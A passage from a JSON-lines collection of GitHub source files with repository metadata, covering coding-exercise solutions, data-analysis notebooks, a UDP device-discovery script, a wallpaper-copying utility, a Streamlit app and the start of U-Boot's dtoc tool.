matrix[i][j];\r\n matrix[i][j] = matrix[j][i];\r\n matrix[j][i] = temp;\r\n }\r\n \r\n //再镜像对称\r\n int left = 0;\r\n int right = matrixSize - 1;\r\n while (left < right){\r\n for (int i = 0; i < matrixSize; ++i){\r\n int temp = matrix[i][left];\r\n matrix[i][left] = matrix[i][right];\r\n matrix[i][right] = temp;\r\n }\r\n left++;\r\n right--;\r\n } \r\n}\r\n\"\"\"\r\nclass Solution(object):\r\n def rotate(self, matrix):\r\n \"\"\"\r\n :type matrix: List[List[int]]\r\n :rtype: void Do not return anything, modify matrix in-place instead.\r\n \"\"\"\r\n # rotate from outside to inside\r\n print(np.array(matrix))\r\n for i in range(len(matrix)):\r\n for j in range(i):\r\n temp = matrix[i][j]\r\n matrix[i][j] = matrix[j][i]\r\n matrix[j][i] = temp\r\n\r\n left = 0\r\n right = len(matrix) - 1\r\n while left < right:\r\n for i in range(len(matrix)):\r\n temp = matrix[i][left]\r\n matrix[i][left] = matrix[i][right]\r\n matrix[i][right] = temp\r\n\r\n left += 1\r\n right -= 1\r\n print(np.array(matrix))\r\n\r\ns = Solution()\r\ns.rotate([[1,2,3,4],[5,6,7,8],[9,10,11,12],[13,14,15,16]])\r\n\"\"\"\r\n[[ 1 2 3 4]\r\n [ 5 6 7 8]\r\n [ 9 10 11 12]\r\n [13 14 15 16]]\r\n[[13 9 5 1]\r\n [14 10 6 2]\r\n [15 11 7 3]\r\n [16 12 8 4]]\r\n\"\"\"","repo_name":"liyunfei1994/MyProject","sub_path":"LeetCode/048_Rotate_Image.py","file_name":"048_Rotate_Image.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17599517230","text":"# Dados do problema:\n# Título: Transporte de Contêineres\n# Origem: Por OBI - Olimpíada Brasileira de Informática 2011 Brazil\n# Link: https://www.beecrowd.com.br/judge/pt/problems/view/2395\n\nA, B, C = input().split()\nA = int(A)\nB = int(B)\nC = int(C)\n\nX, Y, Z = input().split()\nX = int(X)\nY = int(Y)\nZ = int(Z)\n\nquantidade_largura = X // A\nquantidade_comprimento = Y // B\nquantidade_altura = Z // C\ntotal = quantidade_largura * quantidade_comprimento * quantidade_altura\nprint(total)\n","repo_name":"LucasTruppel/exercicios-logica","sub_path":"lista1/poo1_ex_1_14.py","file_name":"poo1_ex_1_14.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16556119891","text":"import random\nimport struct\n\n\nNETFINDER_SERVER_PORT = 3040\n\nNF_IDENTIFY = 0\nNF_IDENTIFY_REPLY = 1\nNF_ASSIGNMENT = 2\nNF_ASSIGNMENT_REPLY = 3\nNF_FLASH_ERASE = 4\nNF_FLASH_ERASE_REPLY = 5\nNF_BLOCK_SIZE = 6\nNF_BLOCK_SIZE_REPLY = 7\nNF_BLOCK_WRITE = 8\nNF_BLOCK_WRITE_REPLY = 9\nNF_VERIFY = 10\nNF_VERIFY_REPLY = 11\nNF_REBOOT = 12\nNF_SET_ETHERNET_ADDRESS = 13\nNF_SET_ETHERNET_ADDRESS_REPLY = 14\nNF_TEST = 15\nNF_TEST_REPLY = 16\n\nNF_SUCCESS = 0\nNF_CRC_MISMATCH = 1\nNF_INVALID_MEMORY_TYPE = 2\nNF_INVALID_SIZE = 3\nNF_INVALID_IP_TYPE = 4\n\nNF_MAGIC = 0x5A\n\nNF_IP_DYNAMIC = 0\nNF_IP_STATIC = 1\n\nNF_ALERT_OK = 0x00\nNF_ALERT_WARN = 0x01\nNF_ALERT_ERROR = 0xFF\n\nNF_MODE_BOOTLOADER = 0\nNF_MODE_APPLICATION = 1\n\nNF_MEMORY_FLASH = 0\nNF_MEMORY_EEPROM = 1\n\nNF_REBOOT_CALL_BOOTLOADER = 0\nNF_REBOOT_RESET = 1\n\n\nHEADER_FMT = \"!2cH6s2x\"\nIDENTIFY_FMT = HEADER_FMT\nIDENTIFY_REPLY_FMT = \"!H6c4s4s4s4s4s4s32s\"\nASSIGNMENT_FMT = \"!3xc4s4s4s32x\"\nASSIGNMENT_REPLY_FMT = \"!c3x\"\nFLASH_ERASE_FMT = HEADER_FMT\nFLASH_ERASE_REPLY_FMT = HEADER_FMT\nBLOCK_SIZE_FMT = HEADER_FMT\nBLOCK_SIZE_REPLY_FMT = \"!H2x\"\nBLOCK_WRITE_FMT = \"!cxHI\"\nBLOCK_WRITE_REPLY_FMT = \"!c3x\"\nVERIFY_FMT = HEADER_FMT\nVERIFY_REPLY_FMT = \"!c3x\"\nREBOOT_FMT = \"!c3x\"\nSET_ETHERNET_ADDRESS_FMT = \"!6s2x\"\nSET_ETHERNET_ADDRESS_REPLY_FMT = HEADER_FMT\nTEST_FMT = HEADER_FMT\nTEST_REPLY_FMT = \"!32s\"\n\nMAX_ATTEMPTS = 10\nMAX_TIMEOUT = 0.5\n\n#-----------------------------------------------------------------------------\ndef MkHeader(id, seq, eth_addr):\n return struct.pack(\n HEADER_FMT,\n bytes(chr(NF_MAGIC),\"utf-8\"),\n bytes(chr(id),\"utf-8\"),\n seq,\n bytes(eth_addr,\"utf-8\")\n ); \n#-----------------------------------------------------------------------------\ndef MkIdentify(seq):\n return MkHeader(NF_IDENTIFY, seq, '\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF')\n\n#-----------------------------------------------------------------------------\ndef UnMkIdentifyReply(msg):\n hdrlen = struct.calcsize(HEADER_FMT)\n \n d = UnMkHeader(msg[0:hdrlen])\n \n params = struct.unpack(\n IDENTIFY_REPLY_FMT,\n msg[hdrlen:]\n ); \n \n d['uptime_days'] = params[0]\n d['uptime_hrs'] = ord(params[1])\n d['uptime_min'] = ord(params[2])\n d['uptime_secs'] = ord(params[3])\n d['mode'] = ord(params[4])\n d['alert'] = ord(params[5])\n d['ip_type'] = ord(params[6])\n d['ip_addr'] = params[7]\n d['ip_netmask'] = params[8]\n d['ip_gw'] = params[9]\n d['app_ver'] = params[10]\n d['boot_ver'] = params[11]\n d['hw_ver'] = params[12]\n d['name'] = params[13]\n return d\n\n#-----------------------------------------------------------------------------\ndef UnMkHeader(msg):\n params = struct.unpack(\n HEADER_FMT,\n msg\n ); \n \n d = {}\n d['magic'] = ord(params[0])\n d['id'] = ord(params[1])\n d['sequence'] = params[2]\n d['eth_addr'] = params[3]\n return d\n#-----------------------------------------------------------------------------\ndef FormatEthAddr(a):\n return \":\".join([\"%02X\" % i for i in a]) \n\n#-----------------------------------------------------------------------------\ndef PrintDetails(d):\n\n print()\n print(\"Ethernet Address: %s \" % FormatEthAddr(d['eth_addr']))\n print(\"Hardware: %s Bootloader: %s Application: %s\" % (socket.inet_ntoa(d['hw_ver']),\n socket.inet_ntoa(d['boot_ver']),\n socket.inet_ntoa(d['app_ver'])))\n #print \"Uptime:\", d['uptime_days'], 'days', d['uptime_hrs'], 'hours', d['uptime_min'], 'minutes', d['uptime_secs'], 'seconds'\n #if d['ip_type'] == NF_IP_STATIC:\n # print \"Static IP\"\n #elif d['ip_type'] == NF_IP_DYNAMIC:\n # print \"Dynamic IP\"\n #else: \n # print \"Unknown IP type\"\n print(\"IP Address: %s Mask :%s Gateway: %s\" % (socket.inet_ntoa(d['ip_addr']),\n socket.inet_ntoa(d['ip_netmask']),\n socket.inet_ntoa(d['ip_gw'])))\n #print \"Mode:\",\n #if d['mode'] == NF_MODE_BOOTLOADER:\n # print 'Bootloader'\n #elif d['mode'] == NF_MODE_APPLICATION:\n # print 'Application'\n #else:\n # print 'Unknown'\n\n#-----------------------------------------------------------------------------\n#-----------------------------------------------------------------------------\n\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\nport = 0\ns.bind((\"10.220.0.2\", port))\nport = s.getsockname()[1]\n\nr = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nr.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nr.setblocking(1)\nr.settimeout(0.500)\nr.bind(('', port))\n\nseq = random.randint(1, 65535)\nmsg = MkIdentify(seq)\n\ns.sendto(msg, ('', NETFINDER_SERVER_PORT))\nreply=r.recv(256)\nd=UnMkIdentifyReply(reply)\nPrintDetails(d)\n\n\n","repo_name":"lwbe/Prologix","sub_path":"new_netfindr.py","file_name":"new_netfindr.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7818642186","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %%\nimport pandas as pd \nimport numpy as np \nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom warnings import filterwarnings\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# %%\n\n# for creating dendrogram \nfrom scipy.cluster.hierarchy import linkage\nimport scipy.cluster.hierarchy as sch\n\n\n# %%\nwine = pd.read_csv(\"wine.csv\")\nwine\n\n\n# %%\nwine.info()\n\n# %% [markdown]\n# ### all numeircal variables |\n\n# %%\nwine.isna().sum()\n\n# %% [markdown]\n# ### no missing values \n# %% [markdown]\n# ## Checking for Distribution of the data \n# \n\n# %%\na = 5 # number of rows\nb = 3 # number of columns\nc = 1 # initialize plot counter\n\nfig = plt.figure(figsize=(15,28))\n\nfor i in wine.columns:\n plt.subplot(a, b, c)\n plt.title('{}'.format(i))\n\n sns.histplot(data= wine, x= i)\n\n c = c + 1\n\nplt.show()\n\n# %% [markdown]\n# ## Numerical variables are usually of 2 type\n# ## Continous variable and Discrete Variables\n\n# %%\ndiscrete_feature=[feature for feature in wine.columns if len(wine[feature].unique())<25]\nprint(\"Discrete Variables Count: {}\".format(len(discrete_feature)))\n\n\n# %%\ncontinuous_feature=[feature for feature in wine.columns if feature not in discrete_feature ]\nprint(\"Continuous feature Count {}\".format(len(continuous_feature)))\n\n\n# %%\na = 7 # number of rows\nb = 2 # number of columns\nc = 1 # initialize plot counter\n\nfig = plt.figure(figsize=(13,20))\n\nfor i in continuous_feature:\n plt.subplot(a, b, c)\n\n sns.histplot(x= i ,data= wine, element= \"poly\", palette=\"deep\" )\n\n c = c + 1\n\nplt.show()\n\n# %% [markdown]\n# ## Checking for outliers\n\n# %%\na = 16 # number of rows\nb = 2 # number of columns\nc = 1 # initialize plot counter\n\nfig = plt.figure(figsize=(13,50))\n\nfor i in wine.columns:\n plt.subplot(a, b, c)\n\n sns.boxplot(x= i ,data= wine, palette=\"deep\" )\n\n c = c + 1\n\nplt.show()\n\n\n# %%\nfor i in wine.columns:\n s = wine[i]\n q1 = s.quantile(0.25)\n q3 = s.quantile(0.75)\n iqr = q3 - q1\n iqr_lower = q1 - 1.5 * iqr\n iqr_upper = q3 + 1.5 * iqr\n outliers = dict(s[(s < iqr_lower) | (s > iqr_upper)])\n\n print(f\"Details of {i} \\n\", \"IQR = \", iqr, \"\\n\", \"IQR lower \", iqr_lower, \"\\n\" , \"IQR upper \",iqr_upper, \"\\n\" ,\"outliers = \", outliers, \"\\n\"\n \n )\n\n# %% [markdown]\n# ## Replacing outlier with upper and lower limit\n\n# %%\nfor i in wine.columns:\n s = wine[i]\n q1 = s.quantile(0.25)\n q3 = s.quantile(0.75)\n iqr = q3 - q1\n iqr_lower = q1 - 1.5 * iqr\n iqr_upper = q3 + 1.5 * iqr\n\n wine[i] = pd.DataFrame(np.where(wine[i] > iqr_upper, iqr_upper, np.where(wine[i] < iqr_lower, iqr_lower, wine[i])))\n\n# %% [markdown]\n# ## outliers Removed\n\n# %%\nfor i in wine.columns:\n s = wine[i]\n q1 = s.quantile(0.25)\n q3 = s.quantile(0.75)\n iqr = q3 - q1\n iqr_lower = q1 - 1.5 * iqr\n iqr_upper = q3 + 1.5 * iqr\n outliers = dict(s[(s < iqr_lower) | (s > iqr_upper)])\n\n print(f\"Details of {i} \\n\", \"IQR = \", iqr, \"\\n\", \"IQR lower \", iqr_lower, \"\\n\" , \"IQR upper \",iqr_upper, \"\\n\" ,\"outliers = \", outliers, \"\\n\"\n \n )\n\n# %% [markdown]\n# # PCA\n\n# %%\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import scale\n\n\n# %%\nlen(wine.columns) # all numerical columns\n\n\n# %%\nwine_normal = scale(wine) # Normalizing the numerical data \nwine_normal\n\n\n# %%\npca = PCA(n_components = 14)\npca_values = pca.fit_transform(wine_normal)\n\n\n# %%\n# The amount of variance that each PCA explains is \nvar = pca.explained_variance_ratio_\nvar\n\n\n# %%\n# Cumulative variance \n\nvar1 = np.cumsum(np.round(var, decimals = 4) * 100)\nvar1\n\n\n# %%\n\n# Variance plot for PCA components obtained \nplt.plot(var1, color = \"red\")\n\n\n# %%\n# PCA scores\npca_values\n\n\n# %%\npca_data = pd.DataFrame(pca_values)\npca_data.columns = ['comp0', 'comp1', 'comp2', 'comp3', 'comp4', 'comp5', 'comp6', 'comp7', 'comp8', 'comp9', 'comp10', 'comp11', 'comp12', 'comp13']\n\n\n# %%\nfinal_wine = pd.concat([wine.Type, pca_data.iloc[:, 0:6]], axis = 1)\nfinal_wine\n\n\n# %%\n# Scatter diagram\nimport matplotlib.pylab as plt\nplt.scatter(x = final_wine.comp0, y = final_wine.comp1)\n\n# %% [markdown]\n# # Heirarchical-Clustering\n\n# %%\n\n# Normalization function \ndef norm_func(i):\n x = (i-i.min())\t/ (i.max()-i.min())\n return (x)\n\n\n# %%\nheir_data_norm = norm_func(final_wine.iloc[:,:])\nheir_data_norm.describe()\n\n\n# %%\nheir_data_norm.isna().sum()\n\n\n# %%\nz = linkage( heir_data_norm, method = \"complete\", metric = \"euclidean\")\n\n\n# %%\n# Dendrogram\nplt.figure(figsize=(15, 8));plt.title('Hierarchical Clustering Dendrogram');plt.xlabel('Index');plt.ylabel('Distance')\nsch.dendrogram(z, \n leaf_rotation = 90, # rotates the x axis labels\n leaf_font_size = 10 # font size for the x axis labels\n)\nplt.show()\n\n\n# %%\nfrom sklearn.cluster import AgglomerativeClustering\n\n# %% [markdown]\n# ## Now applying AgglomerativeClustering choosing 5 as clusters from the above dendrogram\n\n# %%\nh_complete = AgglomerativeClustering(n_clusters = 8, linkage = 'complete', affinity = \"euclidean\").fit(heir_data_norm) \nh_complete.labels_\n\n\n# %%\ncluster_labels = pd.Series(h_complete.labels_)\nfinal_wine['clust'] = cluster_labels # creating a new column and assigning it to new column\n\n\n# %%\nfinal_wine.iloc[:, :].groupby(final_wine.clust).mean()\n\n# %% [markdown]\n# ## Plot of Heirarichical data clustering \n\n# %%\na = 6 # number of rows\nb = 2 # number of columns\nc = 1 # initialize plot counter\n\nfig = plt.figure(figsize=(13,30))\n\nfor i in final_wine.columns:\n plt.subplot(a, b, c)\n\n sns.histplot(x= i,data= final_wine, hue= \"clust\",palette=\"deep\", element= \"poly\" )\n\n c = c + 1\n\nplt.show()\n\n\n# %%\n\n\n\n","repo_name":"sonishrey9/PCA-_Dimension_Reduction","sub_path":"wine-PCA-heirarchical-clust.py","file_name":"wine-PCA-heirarchical-clust.py","file_ext":"py","file_size_in_byte":5700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7761307525","text":"import streamlit as st\nfrom calc import monthly_compound\n\n\n#documenttion found here: https://docs.streamlit.io/library\n\nst.title('How Rich Will I Be?')\n\ninitial = st.number_input(label='Initial value (£)', min_value=(0), max_value=(1000000000))\n\nmonthly = st.number_input(label='Monthly contribution (£)', min_value=(0), max_value=(1000000000))\n\nyears = st.number_input(label='Duration (years)', min_value=(0), max_value=(1000000000))\n\n#to run app go to command line and run: streamlit run app.py\n#to stop it running close command line or click ctr c continously \n#app found on this url: http://localhost:8501/\n\nannual_rate = st.slider(label = 'Annual interest rate (%)', min_value=1, max_value=12, step=1)\n\nfinal_sum = monthly_compound(initial, monthly, annual_rate, years)\n\nst.markdown(f'After {int(years)} years you would have £{round(final_sum, 2)} :sunglasses:')\n","repo_name":"kristineamalie/compound_interest_app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26109953479","text":"'''\nExercicio 0\nDisciplina: MO443 Processamento de Imagens\nProfessor: Helio Pedrini\n1o. semestre de 2018\n\nAluno: Edgar Kenji Tanaka\nRA: 023577\n'''\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom scipy import misc\n\ndef get_histogram(img, out_file):\n # show histogram\n plt.hist(img.ravel().astype(int), 256, [0, 256])\n plt.title(\"Histograma da imagem: \" + out_file)\n plt.savefig(out_file)\n plt.clf()\n\n\ndef print_stats(img, out_file):\n print('------------------------------------------')\n print(\"Estatisticas da imagem:\", out_file)\n print(\"largura:\", img.shape[0])\n print(\"altura:\", img.shape[1])\n print(\"intensidade minima:\", img.min())\n print(\"intensidade maxima:\", img.max())\n print(\"intensidade media: %.2f\" % img.mean())\n print('------------------------------------------\\n')\n\n\ndef get_negative(img, out_file):\n # get negative of the image\n negative_img = 255 - img\n plt.imshow(negative_img, cmap='gray', vmin=0, vmax=255)\n plt.title(\"Negativo: \" + out_file)\n plt.savefig(out_file)\n plt.clf()\n\n\ndef get_converted(img, out_file):\n # convert to gray intensity scale [120,180]\n # total range is 180 - 120 = 60\n # we'll use a simple rule of three\n converted_img = (img * (60/256)) + 120\n plt.imshow(converted_img, cmap='gray', vmin=0, vmax=255)\n plt.title(\"Transformacao de intensidade: \" + out_file)\n plt.savefig(out_file)\n plt.clf()\n\n\ndef main():\n files = [\n 'baboon.png',\n 'butterfly.png',\n 'city.png',\n 'house.png',\n 'seagull.png',\n ]\n\n print('------------- Pre-requirements -----------')\n print('The following files must be in the current directory:')\n print(', '.join(files))\n print('------------------------------------------\\n')\n print('\\n\\n')\n\n for f in files:\n # open image file and stores it in a numpy array\n img = misc.imread(f)\n\n print_stats(img, f)\n get_histogram(img, 'histogram.' + f)\n get_negative(img, 'negative.' + f)\n get_converted(img, 'converted.' + f)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"edgartanaka/mo443","sub_path":"ex0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34845432580","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 1 11:49:32 2022\n\n@author: halfghostx\n@name: Program_1_19.py\n@function: Sine signal and low sampling frequency\n@Python version: Python 3.8\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Sine signal and low sampling frequency. \nfy = 1# Signal frequency in Hz. \nwy = 2*np.pi*fy# Signal frequency in rad/s. \nfs = 7# Sampling frequency in Hz. \ntiv = 1/fs# Time interval between samples. \nt = np.arange(0,3,tiv)# Time intervals set. \ny = np.sin(wy*t)# Signal data set. \nplt.plot(t,y,'-kd',markerfacecolor='none')# Plots figure. \nplt.xlim(0,3)\nplt.ylim(-1.5,1.5)\nplt.xlabel('seconds')\nplt.title('sine signal')\nplt.show()","repo_name":"halfghostx/DigitalSignalProcessing","sub_path":"DigitalSignalProcessingPythonCode/VolumeI/PartI/1.PeriodicSignals/Program_1_19.py","file_name":"Program_1_19.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74121529426","text":"# https://atcoder.jp/contests/tdpc/submissions/19700500\n# D - サイコロ\nimport sys\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\ndef resolve():\n n, d = map(int, input().split())\n\n x = d\n cnt2 = cnt3 = cnt5 = 0\n while x % 2 == 0:\n x //= 2\n cnt2 += 1\n while x % 3 == 0:\n x //= 3\n cnt3 += 1\n while x % 5 == 0:\n x //= 5\n cnt5 += 1\n if x != 1:\n print(0)\n exit()\n\n dp = [[[[0] * (cnt5 + 1) for _ in range(cnt3 + 1)] for _ in range(cnt2 + 1)] for _ in range(n + 1)]\n dp[0][0][0][0] = 1\n for i in range(n):\n for j in range(cnt2 + 1):\n for k in range(cnt3 + 1):\n for l in range(cnt5 + 1):\n now = dp[i][j][k][l]\n dp[i + 1][j][k][l] += now * 1 / 6 # 1が出る\n dp[i + 1][min(j + 1, cnt2)][k][l] += now * 1 / 6 # 2が出る\n dp[i + 1][j][min(k + 1, cnt3)][l] += now * 1 / 6 # 3が出る\n dp[i + 1][min(j + 2, cnt2)][k][l] += now * 1 / 6 # 4が出る\n dp[i + 1][j][k][min(l + 1, cnt5)] += now * 1 / 6 # 5が出る\n dp[i + 1][min(j + 1, cnt2)][min(k + 1, cnt3)][l] += now * 1 / 6 # 6が出る\n res = dp[n][cnt2][cnt3][cnt5]\n print(res)\n\n\nif __name__ == '__main__':\n resolve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/TDPC/TDPC_D.py","file_name":"TDPC_D.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8917784333","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 13 11:51:30 2022\n\n@author: pmetz1\n\"\"\" \n\n# 3rd party\nimport numpy as np\n\n# package\nfrom pymls import Lattice, Dislocation, Stroh, MLS\nfrom pymls.elastic import cij_from_group, cij_from_dict\nfrom pymls.toolbox import abt\nfrom pymls.symmetry import Symmetry as SO\nimport pymls.toolbox as tbx\n\n\n# - 1. crystal lattice\nlattice_scalar = (4.03,) * 3 + (90,) * 3\n\n# - 2. slip system\nhkl = np.array((1,1,1)) # FCC slip plane\nuvw = np.array((1,-1,0)) # burgers vector\nl = np.cross(uvw, hkl) # defines edge dislocation\nphi = abt(uvw, l, degrees=True) # 90 degrees == edge dislocation\nchi = abt(hkl, uvw, degrees=True)\n\n# - 3. elastic constituents\nC = cij_from_group(116.3, 64.8, 30.9, group='m-3m') # GPa\n\n# - 4. class instances\nL = Lattice.from_scalar( lattice_scalar )\nD = Dislocation(lattice=L, hkl=hkl, uvw=uvw, phi=phi, SGno=None)\nS = Stroh(C) # captures characteristic elastic matrix and eigensolution\nI = MLS(dislocation=D, cij=C) # captures sum computation\n\n# - 5. compute values\n# Anizc\n# b[1,-1,0]; n[1,1,1]; l[-1,-1,2]; g[1,-1,0]\nCanzic = 0.51008962\nCmls = I.Chkl(uvw)\nprint(f'Anzic: {Canzic:.6f}; this work: {Cmls:.6f}')\nprint(f'Differs by Canzic / Cmls == {Canzic / Cmls:.6f}')\n\n# plot\nD.visualize()\nI.plot_u()\n\n\n# =============================================================================\n# #%% Sym Eqs\n# # m-3m (215) https://it.iucr.org/Ac/ch2o3v0001/sgtable2o3o225/\n# # 1\n# # 2 || (x,0,0), (0,y,0)\n# # 3 || (x,x,x)\n# # 2 || (x,x,0)\n# # -1 || (0,0,0)\n# R2x00 = SO.rotation((1,0,0), 180)\n# R20y0 = SO.rotation((0,1,0), 180)\n# R3xxx = SO.rotation((1,1,1), 120)\n# R2xx0 = SO.rotation((1,1,0), 180)\n# Inv = SO.inversion()\n# SOS = (R2x00, R20y0, R3xxx, R2xx0, Inv) # set of generators\n# N = (1, 1, 2, 1, 1) # number of times to operate\n# \n# slip = [hkl, uvw]\n# for _ in range(4): # redundant\n# for symOpp, nOpp in list(zip(SOS, N)): # for symOpp in generator set\n# for _ in range(nOpp): # do N times\n# slip = np.asarray(slip).reshape((-1,3)) # ...\n# slip = np.concatenate((slip, symOpp(slip))) # append new symmetric elements\n# slip = slip.reshape((-1,2,3)) # ...\n# slip = tbx.get_unique_pairs(slip) # find unique pairs (elements)\n# # slip = slip.astype(int) # this is changing nominal 1 values to zeros for some reason.... =(\n# slip = np.round(slip, decimals=0).astype(int)\n# m = ~np.array([np.dot(*e) for e in slip], dtype=bool)\n# \n# \n# \n# all_combinations = []\n# for uvw, hkl in slip[m]:\n# dislocation = Dislocation(lattice=lattice, hkl=hkl, uvw=uvw, phi=phi, SGno=None)\n# stroh = Stroh(C) # captures characteristic elastic matrix and eigensolution\n# calc = MLS(dislocation=dislocation, cij=C) # captures sum computation\n# all_combinations.append(calc)\n# \n# s = (1,1,0)\n# mean = np.mean([e.Chkl(s) for e in all_combinations])\n# \n# \n# =============================================================================\n","repo_name":"PetMetz/pymls","sub_path":"examples/aluminum-fcc.py","file_name":"aluminum-fcc.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20115030301","text":"import os\nimport ctypes\nimport shutil\n\nuser32 = ctypes.windll.user32\nf_width = user32.GetSystemMetrics(0)\nf_height = user32.GetSystemMetrics(1)\n\nimages_path = '/AppData/Local/Packages/Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy/LocalState/Assets/'\nextension_convert = '.jpg'\n\n\ndef copy_files():\n source_folder = os.path.expanduser('~') + images_path\n destination_folder = destination\n\n if not os.path.isdir(destination):\n shutil.copytree(source_folder, destination_folder)\n return destination_folder\n else:\n print(\"Folder already exists\")\n\n\ndef convert_to_images():\n for file in os.listdir(destination):\n\n head, tail = os.path.splitext(file)\n if not tail:\n src = os.path.join(destination, file)\n dst = os.path.join(destination, file + extension_convert)\n\n if not os.path.isdir(dst):\n os.rename(src, dst)\n\n\ndef make_folders_by_size():\n names = ['landscape', 'portrait']\n mode = 0o777\n\n for name in names:\n path = os.path.join(destination, name)\n os.mkdir(path, mode)\n\n\ndef group_by_screensize():\n from PIL import Image\n for file in os.listdir(destination):\n im = Image.open(os.path.join(destination, file))\n i_width, i_height = im.size\n im.close()\n if i_width == f_width and i_height == f_height:\n shutil.move(os.path.join(destination, file),\n os.path.join(destination, 'landscape'))\n elif i_width == f_height and i_height == f_width:\n shutil.move(os.path.join(destination, file),\n os.path.join(destination, 'portrait'))\n else:\n os.remove(os.path.join(destination, file))\n\n\ndef main():\n copy_files()\n convert_to_images()\n make_folders_by_size()\n group_by_screensize()\n\n\ndestination = raw_input(\"Enter the folder name to save images: \")\ndestination = os.path.join(os.getcwd(), destination)\nmain()","repo_name":"rafaelMMGH/Get-Windows-Lock-Screen-Spotlight","sub_path":"getWallpapers.py","file_name":"getWallpapers.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25873144711","text":"import sys\nsys.setrecursionlimit(1000000)\ndef input():\n return sys.stdin.readline().rstrip()\nsys.stdin = open('22944.in','r')\ndef solution(node,hp,umbrella,dis):\n global result\n x,y = node\n ex,ey = end_node\n end_dis = abs(ex-x) + abs(ey-y)\n if end_dis <= hp + umbrella:\n result = min(result,dis+end_dis)\n return\n for idx in range(umbrella_cnt):\n ux,uy = umbrella_list[idx]\n if not visited_umbrella[idx]:\n next_dis = abs(ux-x) + abs(uy-y)\n if next_dis > umbrella + hp:\n continue\n visited_umbrella[idx] = True\n next_hp = hp - max(0,next_dis-dis)\n solution((ux,uy),next_hp,D,dis+next_dis)\n visited_umbrella[idx] = False\n\nN,H,D = map(int,input().split())\n\narr = []\nstart_node = []\nend_node = []\numbrella_list = []\nfor x in range(N):\n temp = list(input())\n\n for y in range(N):\n if temp[y] == 'S':\n start_node = (x,y)\n elif temp[y] == 'E':\n end_node = (x,y)\n elif temp[y] == 'U':\n umbrella_list.append((x,y))\n arr.append(temp)\nresult = float('inf')\numbrella_cnt = len(umbrella_list)\nvisited_umbrella = [False for _ in range(umbrella_cnt)]\nsolution(start_node,H,0,0)\n\nif result == float('inf'):\n print(-1)\nelse:\n print(result)","repo_name":"gkgg123/TIL_new","sub_path":"알고리즘/백준/22944_죽음의_비_wrong.py","file_name":"22944_죽음의_비_wrong.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73650825424","text":"from datasets import load_dataset\n\n\ndef push_dataset():\n example = \"Intent-Classification-Commands\"\n print(\"Example of database name (you can name it anything): \", example)\n dataset_id = input(\"Enter your dataset name (huggingface): \")\n dataset = load_dataset('csv', data_files={'train': f'dataset_folder/train.csv', 'test': f'dataset_folder/test.csv'},\n encoding=\"ISO-8859-1\")\n dataset.push_to_hub(dataset_id)\n\n\nif __name__ == '__main__':\n push_dataset()\n","repo_name":"Dipeshpal/Intent-Classification-small-transformers","sub_path":"push_to_hub.py","file_name":"push_to_hub.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41355547308","text":"import collections\nimport copy\nfrom enum import IntEnum\nimport os\nimport re\nimport sys\n\nfrom dtoc import fdt\nfrom dtoc import fdt_util\nfrom dtoc import src_scan\nfrom dtoc.src_scan import conv_name_to_c\n\n# When we see these properties we ignore them - i.e. do not create a structure\n# member\nPROP_IGNORE_LIST = [\n '#address-cells',\n '#gpio-cells',\n '#size-cells',\n 'compatible',\n 'linux,phandle',\n \"status\",\n 'phandle',\n 'bootph-all',\n 'bootph-pre-sram',\n 'bootph-pre-ram',\n]\n\n# C type declarations for the types we support\nTYPE_NAMES = {\n fdt.Type.INT: 'fdt32_t',\n fdt.Type.BYTE: 'unsigned char',\n fdt.Type.STRING: 'const char *',\n fdt.Type.BOOL: 'bool',\n fdt.Type.INT64: 